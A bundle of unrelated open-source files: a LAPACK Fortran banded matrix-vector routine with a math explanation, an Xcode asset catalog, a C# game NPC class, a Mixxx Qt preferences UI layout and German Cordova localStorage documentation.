SUBROUTINE ZLA_GBAMV( TRANS, M, N, KL, KU, ALPHA, AB, LDAB, X,
$ INCX, BETA, Y, INCY )
*
* -- LAPACK computational routine (version 3.7.1) --
* -- LAPACK is a software package provided by Univ. of Tennessee, --
* -- Univ. of California Berkeley, Univ. of Colorado Denver and NAG Ltd..--
* June 2017
*
* .. Scalar Arguments ..
DOUBLE PRECISION ALPHA, BETA
INTEGER INCX, INCY, LDAB, M, N, KL, KU, TRANS
* ..
* .. Array Arguments ..
COMPLEX*16 AB( LDAB, * ), X( * )
DOUBLE PRECISION Y( * )
* ..
*
* =====================================================================
*
* .. Parameters ..
COMPLEX*16 ONE, ZERO
PARAMETER ( ONE = 1.0D+0, ZERO = 0.0D+0 )
* ..
* .. Local Scalars ..
LOGICAL SYMB_ZERO
DOUBLE PRECISION TEMP, SAFE1
INTEGER I, INFO, IY, J, JX, KX, KY, LENX, LENY, KD, KE
COMPLEX*16 CDUM
* ..
* .. External Subroutines ..
EXTERNAL XERBLA, DLAMCH
DOUBLE PRECISION DLAMCH
* ..
* .. External Functions ..
EXTERNAL ILATRANS
INTEGER ILATRANS
* ..
* .. Intrinsic Functions ..
INTRINSIC MAX, ABS, REAL, DIMAG, SIGN
* ..
* .. Statement Functions
DOUBLE PRECISION CABS1
* ..
* .. Statement Function Definitions ..
CABS1( CDUM ) = ABS( DBLE( CDUM ) ) + ABS( DIMAG( CDUM ) )
* ..
* .. Executable Statements ..
*
* Test the input parameters.
*
INFO = 0
IF ( .NOT.( ( TRANS.EQ.ILATRANS( 'N' ) )
$ .OR. ( TRANS.EQ.ILATRANS( 'T' ) )
$ .OR. ( TRANS.EQ.ILATRANS( 'C' ) ) ) ) THEN
INFO = 1
ELSE IF( M.LT.0 )THEN
INFO = 2
ELSE IF( N.LT.0 )THEN
INFO = 3
ELSE IF( KL.LT.0 .OR. KL.GT.M-1 ) THEN
INFO = 4
ELSE IF( KU.LT.0 .OR. KU.GT.N-1 ) THEN
INFO = 5
ELSE IF( LDAB.LT.KL+KU+1 )THEN
INFO = 6
ELSE IF( INCX.EQ.0 )THEN
INFO = 8
ELSE IF( INCY.EQ.0 )THEN
INFO = 11
END IF
IF( INFO.NE.0 )THEN
CALL XERBLA( 'ZLA_GBAMV ', INFO )
RETURN
END IF
*
* Quick return if possible.
*
IF( ( M.EQ.0 ).OR.( N.EQ.0 ).OR.
$ ( ( ALPHA.EQ.ZERO ).AND.( BETA.EQ.ONE ) ) )
$ RETURN
*
* Set LENX and LENY, the lengths of the vectors x and y, and set
* up the start points in X and Y.
*
IF( TRANS.EQ.ILATRANS( 'N' ) )THEN
LENX = N
LENY = M
ELSE
LENX = M
LENY = N
END IF
IF( INCX.GT.0 )THEN
KX = 1
ELSE
KX = 1 - ( LENX - 1 )*INCX
END IF
IF( INCY.GT.0 )THEN
KY = 1
ELSE
KY = 1 - ( LENY - 1 )*INCY
END IF
*
* Set SAFE1 essentially to be the underflow threshold times the
* number of additions in each row.
*
SAFE1 = DLAMCH( 'Safe minimum' )
SAFE1 = (N+1)*SAFE1
*
* Form y := alpha*abs(A)*abs(x) + beta*abs(y).
*
* The O(M*N) SYMB_ZERO tests could be replaced by O(N) queries to
* the inexact flag. Still doesn't help change the iteration order
* to per-column.
*
KD = KU + 1
KE = KL + 1
IY = KY
IF ( INCX.EQ.1 ) THEN
IF( TRANS.EQ.ILATRANS( 'N' ) )THEN
DO I = 1, LENY
IF ( BETA .EQ. 0.0D+0 ) THEN
SYMB_ZERO = .TRUE.
Y( IY ) = 0.0D+0
ELSE IF ( Y( IY ) .EQ. 0.0D+0 ) THEN
SYMB_ZERO = .TRUE.
ELSE
SYMB_ZERO = .FALSE.
Y( IY ) = BETA * ABS( Y( IY ) )
END IF
IF ( ALPHA .NE. 0.0D+0 ) THEN
DO J = MAX( I-KL, 1 ), MIN( I+KU, LENX )
TEMP = CABS1( AB( KD+I-J, J ) )
SYMB_ZERO = SYMB_ZERO .AND.
$ ( X( J ) .EQ. ZERO .OR. TEMP .EQ. ZERO )
Y( IY ) = Y( IY ) + ALPHA*CABS1( X( J ) )*TEMP
END DO
END IF
IF ( .NOT.SYMB_ZERO)
$ Y( IY ) = Y( IY ) + SIGN( SAFE1, Y( IY ) )
IY = IY + INCY
END DO
ELSE
DO I = 1, LENY
IF ( BETA .EQ. 0.0D+0 ) THEN
SYMB_ZERO = .TRUE.
Y( IY ) = 0.0D+0
ELSE IF ( Y( IY ) .EQ. 0.0D+0 ) THEN
SYMB_ZERO = .TRUE.
ELSE
SYMB_ZERO = .FALSE.
Y( IY ) = BETA * ABS( Y( IY ) )
END IF
IF ( ALPHA .NE. 0.0D+0 ) THEN
DO J = MAX( I-KL, 1 ), MIN( I+KU, LENX )
TEMP = CABS1( AB( KE-I+J, I ) )
SYMB_ZERO = SYMB_ZERO .AND.
$ ( X( J ) .EQ. ZERO .OR. TEMP .EQ. ZERO )
Y( IY ) = Y( IY ) + ALPHA*CABS1( X( J ) )*TEMP
END DO
END IF
IF ( .NOT.SYMB_ZERO)
$ Y( IY ) = Y( IY ) + SIGN( SAFE1, Y( IY ) )
IY = IY + INCY
END DO
END IF
ELSE
IF( TRANS.EQ.ILATRANS( 'N' ) )THEN
DO I = 1, LENY
IF ( BETA .EQ. 0.0D+0 ) THEN
SYMB_ZERO = .TRUE.
Y( IY ) = 0.0D+0
ELSE IF ( Y( IY ) .EQ. 0.0D+0 ) THEN
SYMB_ZERO = .TRUE.
ELSE
SYMB_ZERO = .FALSE.
Y( IY ) = BETA * ABS( Y( IY ) )
END IF
IF ( ALPHA .NE. 0.0D+0 ) THEN
JX = KX
DO J = MAX( I-KL, 1 ), MIN( I+KU, LENX )
TEMP = CABS1( AB( KD+I-J, J ) )
SYMB_ZERO = SYMB_ZERO .AND.
$ ( X( JX ) .EQ. ZERO .OR. TEMP .EQ. ZERO )
Y( IY ) = Y( IY ) + ALPHA*CABS1( X( JX ) )*TEMP
JX = JX + INCX
END DO
END IF
IF ( .NOT.SYMB_ZERO )
$ Y( IY ) = Y( IY ) + SIGN( SAFE1, Y( IY ) )
IY = IY + INCY
END DO
ELSE
DO I = 1, LENY
IF ( BETA .EQ. 0.0D+0 ) THEN
SYMB_ZERO = .TRUE.
Y( IY ) = 0.0D+0
ELSE IF ( Y( IY ) .EQ. 0.0D+0 ) THEN
SYMB_ZERO = .TRUE.
ELSE
SYMB_ZERO = .FALSE.
Y( IY ) = BETA * ABS( Y( IY ) )
END IF
IF ( ALPHA .NE. 0.0D+0 ) THEN
JX = KX
DO J = MAX( I-KL, 1 ), MIN( I+KU, LENX )
TEMP = CABS1( AB( KE-I+J, I ) )
SYMB_ZERO = SYMB_ZERO .AND.
$ ( X( JX ) .EQ. ZERO .OR. TEMP .EQ. ZERO )
Y( IY ) = Y( IY ) + ALPHA*CABS1( X( JX ) )*TEMP
JX = JX + INCX
END DO
END IF
IF ( .NOT.SYMB_ZERO )
$ Y( IY ) = Y( IY ) + SIGN( SAFE1, Y( IY ) )
IY = IY + INCY
END DO
END IF
END IF
*
RETURN
*
* End of ZLA_GBAMV
*
END
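In conventional notation, the non-transposed branch above computes, for each row $i$ of the band, with $\mathrm{cabs1}(z) = |\mathrm{Re}\,z| + |\mathrm{Im}\,z|$ and $\lambda = \mathrm{DLAMCH}(\text{'Safe minimum'})$:
\[
y_i \leftarrow \beta\,|y_i| + \alpha \sum_{j=\max(i-k_l,\,1)}^{\min(i+k_u,\,n)} \mathrm{cabs1}(A_{ij})\,\mathrm{cabs1}(x_j),
\qquad
y_i \leftarrow y_i + \mathrm{sign}(y_i)\,(n+1)\,\lambda,
\]
where the final perturbation is skipped only when the row is "symbolically zero": the $\beta$ term contributed nothing ($\beta = 0$ or $y_i = 0$ on entry) and every product in the sum had a zero factor.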
| {
"pile_set_name": "Github"
} |
{
"images" : [
{
"idiom" : "universal",
"scale" : "1x",
"filename" : "api_arrow_white.png"
},
{
"idiom" : "universal",
"scale" : "2x",
"filename" : "[email protected]"
},
{
"idiom" : "universal",
"scale" : "3x",
"filename" : "[email protected]"
}
],
"info" : {
"version" : 1,
"author" : "xcode"
}
} | {
"pile_set_name": "Github"
} |
namespace Server.Mobiles
{
public class MageGuildmaster : BaseGuildmaster
{
public override bool ConvertsMageArmor => true;
[Constructable]
public MageGuildmaster()
: base("mage")
{
SetSkill(SkillName.EvalInt, 85.0, 100.0);
SetSkill(SkillName.Inscribe, 65.0, 88.0);
SetSkill(SkillName.MagicResist, 64.0, 100.0);
SetSkill(SkillName.Magery, 90.0, 100.0);
SetSkill(SkillName.Wrestling, 60.0, 83.0);
SetSkill(SkillName.Meditation, 85.0, 100.0);
SetSkill(SkillName.Macing, 36.0, 68.0);
}
public MageGuildmaster(Serial serial)
: base(serial)
{
}
public override NpcGuild NpcGuild => NpcGuild.MagesGuild;
public override VendorShoeType ShoeType => Utility.RandomBool() ? VendorShoeType.Shoes : VendorShoeType.Sandals;
public override void InitOutfit()
{
base.InitOutfit();
AddItem(new Items.Robe(Utility.RandomBlueHue()));
AddItem(new Items.GnarledStaff());
}
public override void Serialize(GenericWriter writer)
{
base.Serialize(writer);
writer.Write(0); // version
}
public override void Deserialize(GenericReader reader)
{
base.Deserialize(reader);
int version = reader.ReadInt();
}
}
} | {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<ui version="4.0">
<class>DlgPrefDeckDlg</class>
<widget class="QWidget" name="DlgPrefDeckDlg">
<property name="geometry">
<rect>
<x>0</x>
<y>0</y>
<width>710</width>
<height>723</height>
</rect>
</property>
<property name="windowTitle">
<string>Deck Preferences</string>
</property>
<layout class="QGridLayout" name="gridLayout_3">
<item row="0" column="0">
<widget class="QGroupBox" name="groupBoxDeckOptions">
<property name="title">
<string>Deck options</string>
</property>
<layout class="QGridLayout" name="GridLayout1">
<property name="spacing">
<number>10</number>
</property>
<item row="5" column="0">
<widget class="QLabel" name="labelPlayingTrackProtection">
<property name="text">
<string>Playing track protection</string>
</property>
<property name="buddy">
<cstring>checkBoxDisallowLoadToPlayingDeck</cstring>
</property>
</widget>
</item>
<item row="0" column="0">
<widget class="QLabel" name="labelCueMode">
<property name="text">
<string>Cue mode</string>
</property>
<property name="openExternalLinks">
<bool>true</bool>
</property>
<property name="buddy">
<cstring>ComboBoxCueMode</cstring>
</property>
</widget>
</item>
<item row="4" column="1" colspan="2">
<widget class="QComboBox" name="comboBoxLoadPoint"/>
</item>
<item row="1" column="1" colspan="2">
<widget class="QCheckBox" name="checkBoxIntroStartMove">
<property name="toolTip">
<string>When the analyzer places the intro start point automatically,
it will place it at the main cue point if the main cue point has been set previously.
This may be helpful for upgrading to Mixxx 2.3 from earlier versions.
If this option is disabled, the intro start point is automatically placed at the first sound.</string>
</property>
<property name="text">
<string>Set intro start to main cue when analyzing tracks</string>
</property>
</widget>
</item>
<item row="1" column="0">
<widget class="QLabel" name="labelIntroStartMove">
<property name="text">
<string>Intro start</string>
</property>
<property name="buddy">
<cstring>ComboBoxCueMode</cstring>
</property>
</widget>
</item>
<item row="0" column="1" colspan="2">
<widget class="QComboBox" name="ComboBoxCueMode">
<property name="toolTip">
<string>Mixxx mode:
- Cue button while pause at cue point = preview
- Cue button while pause not at cue point = set cue point
- Cue button while playing = pause at cue point
Mixxx mode (no blinking):
- Same as Mixxx mode but with no blinking indicators
Pioneer mode:
- Same as Mixxx mode with a flashing play button
Denon mode:
- Cue button at cue point = preview
- Cue button not at cue point = pause at cue point
- Play = set cue point
Numark mode:
- Same as Denon mode, but without a flashing play button
CUP mode:
- Cue button while pause at cue point = play after release
- Cue button while pause not at cue point = set cue point and play after release
- Cue button while playing = go to cue point and play after release
</string>
</property>
</widget>
</item>
<item row="6" column="0">
<widget class="QLabel" name="labelCloneDeckOnLoadDoubleTap">
<property name="text">
<string>Clone deck</string>
</property>
<property name="buddy">
<cstring>checkBoxCloneDeckOnLoadDoubleTap</cstring>
</property>
</widget>
</item>
<item row="3" column="0">
<widget class="QLabel" name="labelTimeDisplay">
<property name="text">
<string>Time Format</string>
</property>
</widget>
</item>
<item row="3" column="1">
<widget class="QComboBox" name="comboBoxTimeFormat"/>
</item>
<item row="4" column="0">
<widget class="QLabel" name="labelLoadPoint">
<property name="text">
<string>Track load point</string>
</property>
</widget>
</item>
<item row="2" column="0">
<widget class="QLabel" name="labelPositionDisplay">
<property name="enabled">
<bool>true</bool>
</property>
<property name="font">
<font/>
</property>
<property name="text">
<string>Track time display</string>
</property>
<property name="wordWrap">
<bool>false</bool>
</property>
<property name="buddy">
<cstring>radioButtonElapsed</cstring>
</property>
</widget>
</item>
<item row="5" column="1" colspan="2">
<widget class="QCheckBox" name="checkBoxDisallowLoadToPlayingDeck">
<property name="text">
<string>Do not load tracks into playing decks</string>
</property>
</widget>
</item>
<item row="2" column="1" colspan="2">
<layout class="QHBoxLayout" name="horizontalLayout">
<item>
<widget class="QRadioButton" name="radioButtonElapsed">
<property name="text">
<string>Elapsed</string>
</property>
<attribute name="buttonGroup">
<string notr="true">buttonGroupTrackTime</string>
</attribute>
</widget>
</item>
<item>
<widget class="QRadioButton" name="radioButtonRemaining">
<property name="text">
<string>Remaining</string>
</property>
<attribute name="buttonGroup">
<string notr="true">buttonGroupTrackTime</string>
</attribute>
</widget>
</item>
<item>
<widget class="QRadioButton" name="radioButtonElapsedAndRemaining">
<property name="text">
<string>Elapsed and Remaining</string>
</property>
<attribute name="buttonGroup">
<string notr="true">buttonGroupTrackTime</string>
</attribute>
</widget>
</item>
</layout>
</item>
<item row="6" column="1" colspan="2">
<widget class="QCheckBox" name="checkBoxCloneDeckOnLoadDoubleTap">
<property name="toolTip">
<string>Create a playing clone of the first playing deck by double-tapping a Load button on a controller or keyboard.
You can always drag-and-drop tracks on screen to clone a deck.</string>
</property>
<property name="text">
<string>Double-press Load button to clone playing track</string>
</property>
</widget>
</item>
</layout>
</widget>
</item>
<item row="1" column="0">
<widget class="QGroupBox" name="groupBoxSpeedPitchOptions">
<property name="title">
<string>Speed (Tempo) and Key (Pitch) options</string>
</property>
<layout class="QGridLayout" name="gridLayout_7">
<item row="0" column="0">
<layout class="QGridLayout" name="GridLayoutSpeedOptions">
<item row="7" column="1">
<widget class="QDoubleSpinBox" name="spinBoxPermanentRateCoarse">
<property name="toolTip">
<string>Permanent rate change when left-clicking</string>
</property>
<property name="accelerated">
<bool>true</bool>
</property>
<property name="suffix">
<string>%</string>
</property>
<property name="decimals">
<number>2</number>
</property>
<property name="minimum">
<double>0.010000000000000</double>
</property>
<property name="maximum">
<double>10.000000000000000</double>
</property>
<property name="singleStep">
<double>0.010000000000000</double>
</property>
<property name="value">
<double>0.500000000000000</double>
</property>
</widget>
</item>
<item row="8" column="1">
<widget class="QDoubleSpinBox" name="spinBoxPermanentRateFine">
<property name="toolTip">
<string>Permanent rate change when right-clicking</string>
</property>
<property name="accelerated">
<bool>true</bool>
</property>
<property name="suffix">
<string>%</string>
</property>
<property name="decimals">
<number>2</number>
</property>
<property name="minimum">
<double>0.010000000000000</double>
</property>
<property name="maximum">
<double>10.000000000000000</double>
</property>
<property name="singleStep">
<double>0.010000000000000</double>
</property>
<property name="value">
<double>0.050000000000000</double>
</property>
</widget>
</item>
<item row="1" column="0">
<widget class="QLabel" name="labelSpeedPitchReset">
<property name="text">
<string>Reset on track load</string>
</property>
<property name="buddy">
<cstring>checkBoxResetPitch</cstring>
</property>
</widget>
</item>
<item row="2" column="2">
<widget class="QRadioButton" name="radioButtonCurrentKey">
<property name="text">
<string>Current key</string>
</property>
<attribute name="buttonGroup">
<string notr="true">buttonGroupKeyLockMode</string>
</attribute>
</widget>
</item>
<item row="8" column="2">
<widget class="QDoubleSpinBox" name="spinBoxTemporaryRateFine">
<property name="enabled">
<bool>false</bool>
</property>
<property name="toolTip">
<string>Temporary rate change when right-clicking</string>
</property>
<property name="accelerated">
<bool>true</bool>
</property>
<property name="suffix">
<string>%</string>
</property>
<property name="decimals">
<number>2</number>
</property>
<property name="minimum">
<double>0.010000000000000</double>
</property>
<property name="maximum">
<double>10.000000000000000</double>
</property>
<property name="singleStep">
<double>0.010000000000000</double>
</property>
<property name="value">
<double>1.000000000000000</double>
</property>
</widget>
</item>
<item row="6" column="1">
<widget class="QLabel" name="labelSpeedPermanent">
<property name="text">
<string>Permanent</string>
</property>
<property name="alignment">
<set>Qt::AlignCenter</set>
</property>
</widget>
</item>
<item row="5" column="1" colspan="2">
<layout class="QHBoxLayout" name="horizontalLayout_2">
<item>
<widget class="QSlider" name="SliderRateRampSensitivity">
<property name="enabled">
<bool>false</bool>
</property>
<property name="minimum">
<number>100</number>
</property>
<property name="maximum">
<number>2500</number>
</property>
<property name="singleStep">
<number>50</number>
</property>
<property name="value">
<number>250</number>
</property>
<property name="orientation">
<enum>Qt::Horizontal</enum>
</property>
</widget>
</item>
<item>
<widget class="QSpinBox" name="SpinBoxRateRampSensitivity">
<property name="enabled">
<bool>false</bool>
</property>
<property name="toolTip">
<string>Value in milliseconds</string>
</property>
<property name="minimum">
<number>100</number>
</property>
<property name="maximum">
<number>2500</number>
</property>
<property name="singleStep">
<number>1</number>
</property>
<property name="value">
<number>250</number>
</property>
</widget>
</item>
</layout>
</item>
<item row="6" column="2">
<widget class="QLabel" name="labelSpeedTemporary">
<property name="enabled">
<bool>false</bool>
</property>
<property name="text">
<string>Temporary</string>
</property>
<property name="alignment">
<set>Qt::AlignCenter</set>
</property>
</widget>
</item>
<item row="2" column="0">
<widget class="QLabel" name="labelKeylockMode">
<property name="text">
<string>Keylock mode</string>
</property>
<property name="buddy">
<cstring>radioButtonOriginalKey</cstring>
</property>
</widget>
</item>
<item row="5" column="0">
<widget class="QLabel" name="labelSpeedRampSensitivity">
<property name="enabled">
<bool>false</bool>
</property>
<property name="text">
<string>Ramping sensitivity</string>
</property>
<property name="buddy">
<cstring>SliderRateRampSensitivity</cstring>
</property>
</widget>
</item>
<item row="4" column="0">
<widget class="QLabel" name="labelSpeedBendBehavior">
<property name="text">
<string>Pitch bend behavior</string>
</property>
<property name="buddy">
<cstring>radioButtonRateRampModeStepping</cstring>
</property>
</widget>
</item>
<item row="2" column="1">
<widget class="QRadioButton" name="radioButtonOriginalKey">
<property name="text">
<string>Original key</string>
</property>
<attribute name="buttonGroup">
<string notr="true">buttonGroupKeyLockMode</string>
</attribute>
</widget>
</item>
<item row="7" column="2">
<widget class="QDoubleSpinBox" name="spinBoxTemporaryRateCoarse">
<property name="enabled">
<bool>false</bool>
</property>
<property name="toolTip">
<string>Temporary rate change when left-clicking</string>
</property>
<property name="accelerated">
<bool>true</bool>
</property>
<property name="suffix">
<string>%</string>
</property>
<property name="decimals">
<number>2</number>
</property>
<property name="minimum">
<double>0.010000000000000</double>
</property>
<property name="maximum">
<double>10.000000000000000</double>
</property>
<property name="singleStep">
<double>0.010000000000000</double>
</property>
<property name="value">
<double>4.000000000000000</double>
</property>
</widget>
</item>
<item row="1" column="2">
<widget class="QCheckBox" name="checkBoxResetSpeed">
<property name="text">
<string>Speed/Tempo</string>
</property>
<attribute name="buttonGroup">
<string notr="true">buttonGroupSpeedPitchReset</string>
</attribute>
</widget>
</item>
<item row="1" column="1">
<widget class="QCheckBox" name="checkBoxResetPitch">
<property name="text">
<string>Key/Pitch</string>
</property>
<attribute name="buttonGroup">
<string notr="true">buttonGroupSpeedPitchReset</string>
</attribute>
</widget>
</item>
<item row="6" column="0">
<widget class="QLabel" name="labelSpeedAdjustment">
<property name="text">
<string>Adjustment buttons:</string>
</property>
</widget>
</item>
<item row="7" column="0">
<widget class="QLabel" name="labelSpeedCoarse">
<property name="enabled">
<bool>true</bool>
</property>
<property name="font">
<font/>
</property>
<property name="toolTip">
<string/>
</property>
<property name="text">
<string>Coarse</string>
</property>
<property name="alignment">
<set>Qt::AlignRight|Qt::AlignTrailing|Qt::AlignVCenter</set>
</property>
<property name="wordWrap">
<bool>false</bool>
</property>
<property name="buddy">
<cstring>spinBoxPermanentRateCoarse</cstring>
</property>
</widget>
</item>
<item row="8" column="0">
<widget class="QLabel" name="labelSpeedFine">
<property name="enabled">
<bool>true</bool>
</property>
<property name="font">
<font/>
</property>
<property name="toolTip">
<string/>
</property>
<property name="text">
<string>Fine</string>
</property>
<property name="alignment">
<set>Qt::AlignRight|Qt::AlignTrailing|Qt::AlignVCenter</set>
</property>
<property name="wordWrap">
<bool>false</bool>
</property>
<property name="buddy">
<cstring>spinBoxPermanentRateFine</cstring>
</property>
</widget>
</item>
<item row="0" column="2">
<widget class="QCheckBox" name="checkBoxInvertSpeedSlider">
<property name="toolTip">
<string>Make the speed sliders work like those on DJ turntables and CDJs where moving downward increases the speed</string>
</property>
<property name="text">
<string>Down increases speed</string>
</property>
</widget>
</item>
<item row="0" column="0">
<widget class="QLabel" name="labelSpeedSliderrange">
<property name="enabled">
<bool>true</bool>
</property>
<property name="font">
<font/>
</property>
<property name="text">
<string>Slider range</string>
</property>
<property name="wordWrap">
<bool>false</bool>
</property>
<property name="buddy">
<cstring>ComboBoxRateRange</cstring>
</property>
</widget>
</item>
<item row="0" column="1">
<widget class="QComboBox" name="ComboBoxRateRange">
<property name="font">
<font/>
</property>
<property name="toolTip">
<string>Adjusts the range of the speed (Vinyl "Pitch") slider.</string>
</property>
</widget>
</item>
<item row="4" column="2">
<widget class="QRadioButton" name="radioButtonRateRampModeStepping">
<property name="text">
<string>Abrupt jump</string>
</property>
<attribute name="buttonGroup">
<string notr="true">buttonGroupSpeedBendBehavior</string>
</attribute>
</widget>
</item>
<item row="4" column="1">
<widget class="QRadioButton" name="radioButtonRateRampModeLinear">
<property name="toolTip">
<string>Smoothly adjusts deck speed when temporary change buttons are held down</string>
</property>
<property name="text">
<string>Smooth ramping</string>
</property>
<attribute name="buttonGroup">
<string notr="true">buttonGroupSpeedBendBehavior</string>
</attribute>
</widget>
</item>
<item row="3" column="0">
<widget class="QLabel" name="labelKeyunlockMode">
<property name="text">
<string>Keyunlock mode</string>
</property>
</widget>
</item>
<item row="3" column="1">
<widget class="QRadioButton" name="radioButtonResetUnlockedKey">
<property name="text">
<string>Reset key</string>
</property>
<attribute name="buttonGroup">
<string notr="true">buttonGroupKeyUnlockMode</string>
</attribute>
</widget>
</item>
<item row="3" column="2">
<widget class="QRadioButton" name="radioButtonKeepUnlockedKey">
<property name="text">
<string>Keep key</string>
</property>
<attribute name="buttonGroup">
<string notr="true">buttonGroupKeyUnlockMode</string>
</attribute>
</widget>
</item>
</layout>
</item>
</layout>
</widget>
</item>
<item row="2" column="0">
<spacer name="verticalSpacer">
<property name="orientation">
<enum>Qt::Vertical</enum>
</property>
<property name="sizeHint" stdset="0">
<size>
<width>20</width>
<height>40</height>
</size>
</property>
</spacer>
</item>
</layout>
</widget>
<layoutdefault spacing="6" margin="11"/>
<tabstops>
<tabstop>ComboBoxCueMode</tabstop>
<tabstop>radioButtonElapsed</tabstop>
<tabstop>radioButtonRemaining</tabstop>
<tabstop>radioButtonElapsedAndRemaining</tabstop>
<tabstop>checkBoxDisallowLoadToPlayingDeck</tabstop>
<tabstop>ComboBoxRateRange</tabstop>
<tabstop>checkBoxInvertSpeedSlider</tabstop>
<tabstop>checkBoxResetPitch</tabstop>
<tabstop>checkBoxResetSpeed</tabstop>
<tabstop>radioButtonOriginalKey</tabstop>
<tabstop>radioButtonCurrentKey</tabstop>
<tabstop>radioButtonResetUnlockedKey</tabstop>
<tabstop>radioButtonKeepUnlockedKey</tabstop>
<tabstop>radioButtonRateRampModeLinear</tabstop>
<tabstop>radioButtonRateRampModeStepping</tabstop>
<tabstop>SliderRateRampSensitivity</tabstop>
<tabstop>SpinBoxRateRampSensitivity</tabstop>
<tabstop>spinBoxPermanentRateCoarse</tabstop>
<tabstop>spinBoxPermanentRateFine</tabstop>
<tabstop>spinBoxTemporaryRateCoarse</tabstop>
<tabstop>spinBoxTemporaryRateFine</tabstop>
</tabstops>
<resources/>
<connections>
<connection>
<sender>SliderRateRampSensitivity</sender>
<signal>valueChanged(int)</signal>
<receiver>SpinBoxRateRampSensitivity</receiver>
<slot>setValue(int)</slot>
<hints>
<hint type="sourcelabel">
<x>372</x>
<y>442</y>
</hint>
<hint type="destinationlabel">
<x>437</x>
<y>445</y>
</hint>
</hints>
</connection>
<connection>
<sender>SpinBoxRateRampSensitivity</sender>
<signal>valueChanged(int)</signal>
<receiver>SliderRateRampSensitivity</receiver>
<slot>setValue(int)</slot>
<hints>
<hint type="sourcelabel">
<x>437</x>
<y>445</y>
</hint>
<hint type="destinationlabel">
<x>372</x>
<y>442</y>
</hint>
</hints>
</connection>
<connection>
<sender>radioButtonRateRampModeLinear</sender>
<signal>toggled(bool)</signal>
<receiver>labelSpeedRampSensitivity</receiver>
<slot>setEnabled(bool)</slot>
<hints>
<hint type="sourcelabel">
<x>438</x>
<y>417</y>
</hint>
<hint type="destinationlabel">
<x>117</x>
<y>446</y>
</hint>
</hints>
</connection>
<connection>
<sender>radioButtonRateRampModeLinear</sender>
<signal>toggled(bool)</signal>
<receiver>SliderRateRampSensitivity</receiver>
<slot>setEnabled(bool)</slot>
<hints>
<hint type="sourcelabel">
<x>438</x>
<y>417</y>
</hint>
<hint type="destinationlabel">
<x>372</x>
<y>442</y>
</hint>
</hints>
</connection>
<connection>
<sender>radioButtonRateRampModeLinear</sender>
<signal>toggled(bool)</signal>
<receiver>SpinBoxRateRampSensitivity</receiver>
<slot>setEnabled(bool)</slot>
<hints>
<hint type="sourcelabel">
<x>438</x>
<y>417</y>
</hint>
<hint type="destinationlabel">
<x>437</x>
<y>445</y>
</hint>
</hints>
</connection>
<connection>
<sender>radioButtonRateRampModeStepping</sender>
<signal>toggled(bool)</signal>
<receiver>labelSpeedTemporary</receiver>
<slot>setEnabled(bool)</slot>
<hints>
<hint type="sourcelabel">
<x>263</x>
<y>417</y>
</hint>
<hint type="destinationlabel">
<x>438</x>
<y>467</y>
</hint>
</hints>
</connection>
<connection>
<sender>radioButtonRateRampModeStepping</sender>
<signal>toggled(bool)</signal>
<receiver>spinBoxTemporaryRateCoarse</receiver>
<slot>setEnabled(bool)</slot>
<hints>
<hint type="sourcelabel">
<x>263</x>
<y>417</y>
</hint>
<hint type="destinationlabel">
<x>438</x>
<y>493</y>
</hint>
</hints>
</connection>
<connection>
<sender>radioButtonRateRampModeStepping</sender>
<signal>toggled(bool)</signal>
<receiver>spinBoxTemporaryRateFine</receiver>
<slot>setEnabled(bool)</slot>
<hints>
<hint type="sourcelabel">
<x>263</x>
<y>417</y>
</hint>
<hint type="destinationlabel">
<x>438</x>
<y>521</y>
</hint>
</hints>
</connection>
</connections>
<buttongroups>
<buttongroup name="buttonGroupTrackTime"/>
<buttongroup name="buttonGroupKeyUnlockMode"/>
<buttongroup name="buttonGroupKeyLockMode"/>
<buttongroup name="buttonGroupSpeedBendBehavior"/>
<buttongroup name="buttonGroupSpeedPitchReset">
<property name="exclusive">
<bool>false</bool>
</property>
</buttongroup>
</buttongroups>
</ui>
| {
"pile_set_name": "Github"
} |
---
license: >
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
title: localStorage
---
# localStorage
Ermöglicht den Zugriff auf die W3C [Web-Speicherschnittstelle][1]
[1]: http://dev.w3.org/html5/webstorage/#the-localstorage-attribute
var permanentStorage = window.localStorage;
var tempStorage = window.sessionStorage;
## Methoden
* **Schlüssel**: gibt den Namen des Schlüssels an der angegebenen Position zurück.
* **GetItem**: gibt das Element mit dem angegebenen Schlüssel identifiziert.
* **SetItem**: weist eine freigestellte Element Wert.
* **RemoveItem**: entfernt das Element mit dem angegebenen Schlüssel identifiziert.
* **Löschen**: entfernt alle Schlüssel/Wert-Paare.
## Informationen
Die `window.localStorage` -Schnittstelle implementiert die W3C [Web-Speicherschnittstelle][2]. Eine app kann damit um persistente Daten mithilfe von Schlüssel-Wert-Paaren zu speichern. Die `window.sessionStorage` Schnittstelle funktioniert genauso in jeder Hinsicht, es sei denn, dass alle Daten jedes Mal die app schließt deaktiviert ist. Jede [Datenbank](../database/database.html) bietet einen separaten Namespace.
[2]: http://dev.w3.org/html5/webstorage/
## Unterstützte Plattformen
* Android
* BlackBerry WebWorks (OS 6.0 und höher)
* iOS
* Tizen
* Windows Phone 7 und 8
## Schnelle Schlüsselbeispiel
var keyName = window.localStorage.key(0);
## Set Item Beispiel
window.localStorage.setItem("key", "value");
## Element kurzes Beispiel zu erhalten
var value = window.localStorage.getItem("key");
// value is now equal to "value"
## Kleines Beispiel Element entfernen
window.localStorage.removeItem("key");
## Kleines Beispiel zu löschen
window.localStorage.clear();
## Vollständiges Beispiel
<!DOCTYPE html>
<html>
<head>
<title>Storage Example</title>
<script type="text/javascript" charset="utf-8" src="cordova.js"></script>
<script type="text/javascript" charset="utf-8">
// Wait for device API libraries to load
//
document.addEventListener("deviceready", onDeviceReady, false);
// device APIs are available
//
function onDeviceReady() {
window.localStorage.setItem("key", "value");
var keyname = window.localStorage.key(0);
// keyname is now equal to "key"
var value = window.localStorage.getItem("key");
// value is now equal to "value"
window.localStorage.removeItem("key");
window.localStorage.setItem("key2", "value2");
window.localStorage.clear();
// localStorage is now empty
}
</script>
</head>
<body>
<h1>Example</h1>
<p>localStorage</p>
</body>
</html>
## Windows Phone 7 Macken
